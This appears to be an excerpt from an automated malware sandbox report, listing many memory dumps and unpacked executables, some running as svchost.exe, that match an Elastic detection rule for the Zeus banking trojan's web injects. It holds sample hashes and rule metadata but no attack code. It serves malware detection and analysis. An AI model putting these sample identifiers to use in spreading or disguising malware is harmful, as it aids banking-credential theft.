    Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.2a60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.888000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2e60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.cUKxeliGgCix.exe.2e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88e000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.29b2000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.888000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2122838115.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2148937854.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2148202911.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2085563503.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2139994555.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2148457384.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2132018023.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
